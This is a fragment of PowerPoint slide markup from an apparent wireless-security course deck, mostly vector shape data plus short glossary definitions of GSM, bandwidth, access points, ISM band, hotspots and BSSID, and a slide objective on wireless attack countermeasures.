                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="168"/>
                    <a:pt x="0" y="154"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="144"/>
                    <a:pt x="38" y="150"/>
                    <a:pt x="42" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="160"/>
                    <a:pt x="50" y="162"/>
                    <a:pt x="55" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="162"/>
                    <a:pt x="66" y="159"/>
                    <a:pt x="69" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="139"/>
                    <a:pt x="74" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="117"/>
                    <a:pt x="72" y="109"/>
                    <a:pt x="69" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="96"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="54" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="92"/>
                    <a:pt x="45" y="94"/>
                    <a:pt x="42" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="99"/>
                    <a:pt x="37" y="103"/>
                    <a:pt x="36" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3" y="10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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="TextBox 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{958C8B45-68FD-4C11-8CCA-3AC65550BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8709" y="4801020"/>
            <a:ext cx="2776992" cy="6697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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408432093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" name="TextBox 245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950792" y="2271455"/>
            <a:ext cx="742512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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="-불탄고딕B" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GSM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Rectangle 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2689360"/>
            <a:ext cx="3200400" cy="83099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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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A universal system used for mobile transportation for wireless networks worldwide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="TextBox 308"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393853" y="2271455"/>
            <a:ext cx="1404295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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bandwidth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Rectangle 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427220" y="2689360"/>
            <a:ext cx="3352800" cy="83099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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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Describes the amount of information that may be broadcast over a connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="TextBox 356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8818495" y="2271455"/>
            <a:ext cx="2148345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 algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access point (AP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Rectangle 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="2689360"/>
            <a:ext cx="3048000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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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Used to connect wireless devices to a wireless/wired network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="TextBox 360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461051" y="5002251"/>
            <a:ext cx="1269899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 algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISM band</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Rectangle 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427220" y="5410200"/>
            <a:ext cx="3619500" cy="83099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55563" lvl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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A set of frequencies for the international industrial, scientific, and medical communities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="TextBox 362"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9369126" y="5002251"/>
            <a:ext cx="1047083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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hotspot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Rectangle 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5410200"/>
            <a:ext cx="3048000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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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A place where a wireless network is available for public use </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0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65" name="TextBox 364"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885871" y="5002251"/>
            <a:ext cx="872355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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="-불탄고딕B" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BSSID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Rectangle 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5410200"/>
            <a:ext cx="3200400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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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The MAC address of an AP that has set up a Basic Service Set (BSS)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50FD6DC-F83D-42F6-9C5F-34ED590C17BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1824555" y="1181100"/>
            <a:ext cx="994987" cy="994987"/>
            <a:chOff x="1828800" y="1219200"/>
            <a:chExt cx="994987" cy="994987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1828800" y="1219200"/>
              <a:ext cx="994987" cy="994987"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="285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" name="AutoShape 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4D9EB3-45EA-495B-B95D-5855A382E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793" y="1411209"/>
              <a:ext cx="385496" cy="58475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636" y="3374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1963" y="3375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="2025"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1963" y="1653"/>
                    <a:pt x="2402" y="1350"/>
                    <a:pt x="2945" y="1350"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18654" y="1349"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19195" y="1349"/>
                    <a:pt x="19636" y="1652"/>
                    <a:pt x="19636" y="2024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19636" y="2024"/>
                    <a:pt x="19636" y="3374"/>
                    <a:pt x="19636" y="3374"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19636" y="17546"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1963" y="17547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="4050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19636" y="4049"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19636" y="4049"/>
                    <a:pt x="19636" y="17546"/>
                    <a:pt x="19636" y="17546"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19636" y="19574"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19636" y="19946"/>
                    <a:pt x="19195" y="20249"/>
                    <a:pt x="18654" y="20249"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2945" y="20250"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2402" y="20250"/>
                    <a:pt x="1963" y="19947"/>
                    <a:pt x="1963" y="19575"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1963" y="18222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19636" y="18221"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19636" y="18221"/>
                    <a:pt x="19636" y="19574"/>
                    <a:pt x="19636" y="19574"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18654" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2945" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="0"/>
                    <a:pt x="0" y="907"/>
                    <a:pt x="0" y="2025"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="19575"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="20693"/>
                    <a:pt x="1317" y="21600"/>
                    <a:pt x="2945" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18654" y="21599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20280" y="21599"/>
                    <a:pt x="21600" y="20693"/>
                    <a:pt x="21600" y="19574"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="2024"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="906"/>
                    <a:pt x="20280" y="0"/>
                    <a:pt x="18654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lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas"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lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas"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4175A355-01F8-4147-BC69-682E15B81758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9395174" y="1181100"/>
            <a:ext cx="994987" cy="994987"/>
            <a:chOff x="9009596" y="1143000"/>
            <a:chExt cx="994987" cy="994987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="285" name="Oval 284"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9009596" y="1143000"/>
              <a:ext cx="994987" cy="994987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 w="285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Freeform 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517F0483-79F8-40AE-A72A-CD50D2206A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6161" y="1339330"/>
              <a:ext cx="596484" cy="567535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168021 w 50"/>
                <a:gd name="T1" fmla="*/ 168021 h 50"/>
                <a:gd name="T2" fmla="*/ 164592 w 50"/>
                <a:gd name="T3" fmla="*/ 171450 h 50"/>
                <a:gd name="T4" fmla="*/ 147447 w 50"/>
                <a:gd name="T5" fmla="*/ 171450 h 50"/>
                <a:gd name="T6" fmla="*/ 137160 w 50"/>
                <a:gd name="T7" fmla="*/ 164592 h 50"/>
                <a:gd name="T8" fmla="*/ 6858 w 50"/>
                <a:gd name="T9" fmla="*/ 34290 h 50"/>
                <a:gd name="T10" fmla="*/ 0 w 50"/>
                <a:gd name="T11" fmla="*/ 24003 h 50"/>
                <a:gd name="T12" fmla="*/ 0 w 50"/>
                <a:gd name="T13" fmla="*/ 6858 h 50"/>
                <a:gd name="T14" fmla="*/ 0 w 50"/>
                <a:gd name="T15" fmla="*/ 3429 h 50"/>
                <a:gd name="T16" fmla="*/ 6858 w 50"/>
                <a:gd name="T17" fmla="*/ 0 h 50"/>
                <a:gd name="T18" fmla="*/ 6858 w 50"/>
                <a:gd name="T19" fmla="*/ 0 h 50"/>
                <a:gd name="T20" fmla="*/ 120015 w 50"/>
                <a:gd name="T21" fmla="*/ 51435 h 50"/>
                <a:gd name="T22" fmla="*/ 171450 w 50"/>
                <a:gd name="T23" fmla="*/ 164592 h 50"/>
                <a:gd name="T24" fmla="*/ 168021 w 50"/>
                <a:gd name="T25" fmla="*/ 168021 h 50"/>
                <a:gd name="T26" fmla="*/ 106299 w 50"/>
                <a:gd name="T27" fmla="*/ 168021 h 50"/>
                <a:gd name="T28" fmla="*/ 99441 w 50"/>
                <a:gd name="T29" fmla="*/ 171450 h 50"/>
                <a:gd name="T30" fmla="*/ 85725 w 50"/>
                <a:gd name="T31" fmla="*/ 171450 h 50"/>
                <a:gd name="T32" fmla="*/ 75438 w 50"/>
                <a:gd name="T33" fmla="*/ 164592 h 50"/>
                <a:gd name="T34" fmla="*/ 6858 w 50"/>
                <a:gd name="T35" fmla="*/ 96012 h 50"/>
                <a:gd name="T36" fmla="*/ 0 w 50"/>
                <a:gd name="T37" fmla="*/ 85725 h 50"/>
                <a:gd name="T38" fmla="*/ 0 w 50"/>
                <a:gd name="T39" fmla="*/ 68580 h 50"/>
                <a:gd name="T40" fmla="*/ 3429 w 50"/>
                <a:gd name="T41" fmla="*/ 65151 h 50"/>
                <a:gd name="T42" fmla="*/ 6858 w 50"/>
                <a:gd name="T43" fmla="*/ 61722 h 50"/>
                <a:gd name="T44" fmla="*/ 6858 w 50"/>
                <a:gd name="T45" fmla="*/ 61722 h 50"/>
                <a:gd name="T46" fmla="*/ 75438 w 50"/>
                <a:gd name="T47" fmla="*/ 96012 h 50"/>
                <a:gd name="T48" fmla="*/ 109728 w 50"/>
                <a:gd name="T49" fmla="*/ 164592 h 50"/>
                <a:gd name="T50" fmla="*/ 106299 w 50"/>
                <a:gd name="T51" fmla="*/ 168021 h 50"/>
                <a:gd name="T52" fmla="*/ 24003 w 50"/>
                <a:gd name="T53" fmla="*/ 171450 h 50"/>
                <a:gd name="T54" fmla="*/ 0 w 50"/>
                <a:gd name="T55" fmla="*/ 147447 h 50"/>
                <a:gd name="T56" fmla="*/ 24003 w 50"/>
                <a:gd name="T57" fmla="*/ 123444 h 50"/>
                <a:gd name="T58" fmla="*/ 44577 w 50"/>
                <a:gd name="T59" fmla="*/ 147447 h 50"/>
                <a:gd name="T60" fmla="*/ 24003 w 50"/>
                <a:gd name="T61" fmla="*/ 171450 h 5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0" h="50">
                  <a:moveTo>
                    <a:pt x="49" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="50"/>
                    <a:pt x="48" y="50"/>
                    <a:pt x="48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1" y="50"/>
                    <a:pt x="40" y="49"/>
                    <a:pt x="40" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="27"/>
                    <a:pt x="23" y="11"/>
                    <a:pt x="2" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="9"/>
                    <a:pt x="0" y="8"/>
                    <a:pt x="0" y="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" y="1"/>
                    <a:pt x="26" y="6"/>
                    <a:pt x="35" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="24"/>
                    <a:pt x="49" y="35"/>
                    <a:pt x="50" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="48"/>
                    <a:pt x="50" y="49"/>
                    <a:pt x="49" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="31" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="50"/>
                    <a:pt x="30" y="50"/>
                    <a:pt x="29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3" y="50"/>
                    <a:pt x="23" y="49"/>
                    <a:pt x="22" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="37"/>
                    <a:pt x="13" y="29"/>
                    <a:pt x="2" y="28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19"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1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0" y="19"/>
                    <a:pt x="17" y="22"/>
                    <a:pt x="22" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="33"/>
                    <a:pt x="31" y="40"/>
                    <a:pt x="32" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="48"/>
                    <a:pt x="32" y="49"/>
                    <a:pt x="31" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="50"/>
                    <a:pt x="0" y="47"/>
                    <a:pt x="0" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40"/>
                    <a:pt x="3" y="36"/>
                    <a:pt x="7" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="36"/>
                    <a:pt x="13" y="40"/>
                    <a:pt x="13" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="10" y="50"/>
                    <a:pt x="7" y="5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0EA54710-FB9D-4DEF-A547-C4BEF1D333DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5598507" y="3941494"/>
            <a:ext cx="994987" cy="994987"/>
            <a:chOff x="5588929" y="3959046"/>
            <a:chExt cx="994987" cy="994987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="302" name="Oval 301"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588929" y="3959046"/>
              <a:ext cx="994987" cy="994987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 w="285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3" name="Freeform 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6034EAA4-EB6C-4015-B139-8AC347C421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99835" y="4201329"/>
              <a:ext cx="591387" cy="490426"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 253546 w 168"/>
                <a:gd name="T1" fmla="*/ 247650 h 152"/>
                <a:gd name="T2" fmla="*/ 234043 w 168"/>
                <a:gd name="T3" fmla="*/ 228099 h 152"/>
                <a:gd name="T4" fmla="*/ 234043 w 168"/>
                <a:gd name="T5" fmla="*/ 19551 h 152"/>
                <a:gd name="T6" fmla="*/ 253546 w 168"/>
                <a:gd name="T7" fmla="*/ 0 h 152"/>
                <a:gd name="T8" fmla="*/ 273050 w 168"/>
                <a:gd name="T9" fmla="*/ 19551 h 152"/>
                <a:gd name="T10" fmla="*/ 273050 w 168"/>
                <a:gd name="T11" fmla="*/ 228099 h 152"/>
                <a:gd name="T12" fmla="*/ 253546 w 168"/>
                <a:gd name="T13" fmla="*/ 247650 h 152"/>
                <a:gd name="T14" fmla="*/ 175532 w 168"/>
                <a:gd name="T15" fmla="*/ 247650 h 152"/>
                <a:gd name="T16" fmla="*/ 156029 w 168"/>
                <a:gd name="T17" fmla="*/ 228099 h 152"/>
                <a:gd name="T18" fmla="*/ 156029 w 168"/>
                <a:gd name="T19" fmla="*/ 71688 h 152"/>
                <a:gd name="T20" fmla="*/ 175532 w 168"/>
                <a:gd name="T21" fmla="*/ 52137 h 152"/>
                <a:gd name="T22" fmla="*/ 195036 w 168"/>
                <a:gd name="T23" fmla="*/ 71688 h 152"/>
                <a:gd name="T24" fmla="*/ 195036 w 168"/>
                <a:gd name="T25" fmla="*/ 228099 h 152"/>
                <a:gd name="T26" fmla="*/ 175532 w 168"/>
                <a:gd name="T27" fmla="*/ 247650 h 152"/>
                <a:gd name="T28" fmla="*/ 97518 w 168"/>
                <a:gd name="T29" fmla="*/ 247650 h 152"/>
                <a:gd name="T30" fmla="*/ 78014 w 168"/>
                <a:gd name="T31" fmla="*/ 228099 h 152"/>
                <a:gd name="T32" fmla="*/ 78014 w 168"/>
                <a:gd name="T33" fmla="*/ 123825 h 152"/>
                <a:gd name="T34" fmla="*/ 97518 w 168"/>
                <a:gd name="T35" fmla="*/ 104274 h 152"/>
                <a:gd name="T36" fmla="*/ 117021 w 168"/>
                <a:gd name="T37" fmla="*/ 123825 h 152"/>
                <a:gd name="T38" fmla="*/ 117021 w 168"/>
                <a:gd name="T39" fmla="*/ 228099 h 152"/>
                <a:gd name="T40" fmla="*/ 97518 w 168"/>
                <a:gd name="T41" fmla="*/ 247650 h 152"/>
                <a:gd name="T42" fmla="*/ 19504 w 168"/>
                <a:gd name="T43" fmla="*/ 247650 h 152"/>
                <a:gd name="T44" fmla="*/ 0 w 168"/>
                <a:gd name="T45" fmla="*/ 228099 h 152"/>
                <a:gd name="T46" fmla="*/ 0 w 168"/>
                <a:gd name="T47" fmla="*/ 175962 h 152"/>
                <a:gd name="T48" fmla="*/ 19504 w 168"/>
                <a:gd name="T49" fmla="*/ 156411 h 152"/>
                <a:gd name="T50" fmla="*/ 39007 w 168"/>
                <a:gd name="T51" fmla="*/ 175962 h 152"/>
                <a:gd name="T52" fmla="*/ 39007 w 168"/>
                <a:gd name="T53" fmla="*/ 228099 h 152"/>
                <a:gd name="T54" fmla="*/ 19504 w 168"/>
                <a:gd name="T55" fmla="*/ 247650 h 15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68" h="152">
                  <a:moveTo>
                    <a:pt x="156" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="152"/>
                    <a:pt x="144" y="147"/>
                    <a:pt x="144" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="12"/>
                    <a:pt x="144" y="12"/>
                    <a:pt x="144" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="5"/>
